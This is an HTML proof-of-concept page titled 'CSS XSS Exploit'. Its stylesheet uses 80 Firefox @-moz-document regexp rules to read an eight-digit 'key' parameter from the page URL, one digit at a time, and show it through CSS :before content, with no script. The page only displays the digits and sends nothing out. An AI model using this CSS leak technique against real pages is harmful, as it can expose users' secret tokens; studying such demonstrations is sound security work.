<html>
    <head>
        <title>CSS XSS Exploit</title>
        <style>
body {
    background: #000;
    color: #0f0;
    font-family: monospace;
    font-size: 26px;
    padding-top: 10px;
    text-align: center;
}
@-moz-document regexp(".*?key=0.*"){#c0:before{content:"0"}}
@-moz-document regexp(".*?key=1.*"){#c0:before{content:"1"}}
@-moz-document regexp(".*?key=2.*"){#c0:before{content:"2"}}
@-moz-document regexp(".*?key=3.*"){#c0:before{content:"3"}}
@-moz-document regexp(".*?key=4.*"){#c0:before{content:"4"}}
@-moz-document regexp(".*?key=5.*"){#c0:before{content:"5"}}
@-moz-document regexp(".*?key=6.*"){#c0:before{content:"6"}}
@-moz-document regexp(".*?key=7.*"){#c0:before{content:"7"}}
@-moz-document regexp(".*?key=8.*"){#c0:before{content:"8"}}
@-moz-document regexp(".*?key=9.*"){#c0:before{content:"9"}}
@-moz-document regexp(".*?key=.0.*"){#c1:before{content:"0"}}
@-moz-document regexp(".*?key=.1.*"){#c1:before{content:"1"}}
@-moz-document regexp(".*?key=.2.*"){#c1:before{content:"2"}}
@-moz-document regexp(".*?key=.3.*"){#c1:before{content:"3"}}
@-moz-document regexp(".*?key=.4.*"){#c1:before{content:"4"}}
@-moz-document regexp(".*?key=.5.*"){#c1:before{content:"5"}}
@-moz-document regexp(".*?key=.6.*"){#c1:before{content:"6"}}
@-moz-document regexp(".*?key=.7.*"){#c1:before{content:"7"}}
@-moz-document regexp(".*?key=.8.*"){#c1:before{content:"8"}}
@-moz-document regexp(".*?key=.9.*"){#c1:before{content:"9"}}
@-moz-document regexp(".*?key=..0.*"){#c2:before{content:"0"}}
@-moz-document regexp(".*?key=..1.*"){#c2:before{content:"1"}}
@-moz-document regexp(".*?key=..2.*"){#c2:before{content:"2"}}
@-moz-document regexp(".*?key=..3.*"){#c2:before{content:"3"}}
@-moz-document regexp(".*?key=..4.*"){#c2:before{content:"4"}}
@-moz-document regexp(".*?key=..5.*"){#c2:before{content:"5"}}
@-moz-document regexp(".*?key=..6.*"){#c2:before{content:"6"}}
@-moz-document regexp(".*?key=..7.*"){#c2:before{content:"7"}}
@-moz-document regexp(".*?key=..8.*"){#c2:before{content:"8"}}
@-moz-document regexp(".*?key=..9.*"){#c2:before{content:"9"}}
@-moz-document regexp(".*?key=...0.*"){#c3:before{content:"0"}}
@-moz-document regexp(".*?key=...1.*"){#c3:before{content:"1"}}
@-moz-document regexp(".*?key=...2.*"){#c3:before{content:"2"}}
@-moz-document regexp(".*?key=...3.*"){#c3:before{content:"3"}}
@-moz-document regexp(".*?key=...4.*"){#c3:before{content:"4"}}
@-moz-document regexp(".*?key=...5.*"){#c3:before{content:"5"}}
@-moz-document regexp(".*?key=...6.*"){#c3:before{content:"6"}}
@-moz-document regexp(".*?key=...7.*"){#c3:before{content:"7"}}
@-moz-document regexp(".*?key=...8.*"){#c3:before{content:"8"}}
@-moz-document regexp(".*?key=...9.*"){#c3:before{content:"9"}}
@-moz-document regexp(".*?key=....0.*"){#c4:before{content:"0"}}
@-moz-document regexp(".*?key=....1.*"){#c4:before{content:"1"}}
@-moz-document regexp(".*?key=....2.*"){#c4:before{content:"2"}}
@-moz-document regexp(".*?key=....3.*"){#c4:before{content:"3"}}
@-moz-document regexp(".*?key=....4.*"){#c4:before{content:"4"}}
@-moz-document regexp(".*?key=....5.*"){#c4:before{content:"5"}}
@-moz-document regexp(".*?key=....6.*"){#c4:before{content:"6"}}
@-moz-document regexp(".*?key=....7.*"){#c4:before{content:"7"}}
@-moz-document regexp(".*?key=....8.*"){#c4:before{content:"8"}}
@-moz-document regexp(".*?key=....9.*"){#c4:before{content:"9"}}
@-moz-document regexp(".*?key=.....0.*"){#c5:before{content:"0"}}
@-moz-document regexp(".*?key=.....1.*"){#c5:before{content:"1"}}
@-moz-document regexp(".*?key=.....2.*"){#c5:before{content:"2"}}
@-moz-document regexp(".*?key=.....3.*"){#c5:before{content:"3"}}
@-moz-document regexp(".*?key=.....4.*"){#c5:before{content:"4"}}
@-moz-document regexp(".*?key=.....5.*"){#c5:before{content:"5"}}
@-moz-document regexp(".*?key=.....6.*"){#c5:before{content:"6"}}
@-moz-document regexp(".*?key=.....7.*"){#c5:before{content:"7"}}
@-moz-document regexp(".*?key=.....8.*"){#c5:before{content:"8"}}
@-moz-document regexp(".*?key=.....9.*"){#c5:before{content:"9"}}
@-moz-document regexp(".*?key=......0.*"){#c6:before{content:"0"}}
@-moz-document regexp(".*?key=......1.*"){#c6:before{content:"1"}}
@-moz-document regexp(".*?key=......2.*"){#c6:before{content:"2"}}
@-moz-document regexp(".*?key=......3.*"){#c6:before{content:"3"}}
@-moz-document regexp(".*?key=......4.*"){#c6:before{content:"4"}}
@-moz-document regexp(".*?key=......5.*"){#c6:before{content:"5"}}
@-moz-document regexp(".*?key=......6.*"){#c6:before{content:"6"}}
@-moz-document regexp(".*?key=......7.*"){#c6:before{content:"7"}}
@-moz-document regexp(".*?key=......8.*"){#c6:before{content:"8"}}
@-moz-document regexp(".*?key=......9.*"){#c6:before{content:"9"}}
@-moz-document regexp(".*?key=.......0.*"){#c7:before{content:"0"}}
@-moz-document regexp(".*?key=.......1.*"){#c7:before{content:"1"}}
@-moz-document regexp(".*?key=.......2.*"){#c7:before{content:"2"}}
@-moz-document regexp(".*?key=.......3.*"){#c7:before{content:"3"}}
@-moz-document regexp(".*?key=.......4.*"){#c7:before{content:"4"}}
@-moz-document regexp(".*?key=.......5.*"){#c7:before{content:"5"}}
@-moz-document regexp(".*?key=.......6.*"){#c7:before{content:"6"}}
@-moz-document regexp(".*?key=.......7.*"){#c7:before{content:"7"}}
@-moz-document regexp(".*?key=.......8.*"){#c7:before{content:"8"}}
@-moz-document regexp(".*?key=.......9.*"){#c7:before{content:"9"}}
        </style>
    </head>
    <body>
        <span id="c0"></span>
        <span id="c1"></span>
        <span id="c2"></span>
        <span id="c3"></span>
        <span id="c4"></span>
        <span id="c5"></span>
        <span id="c6"></span>
        <span id="c7"></span>
    </body>
</html>
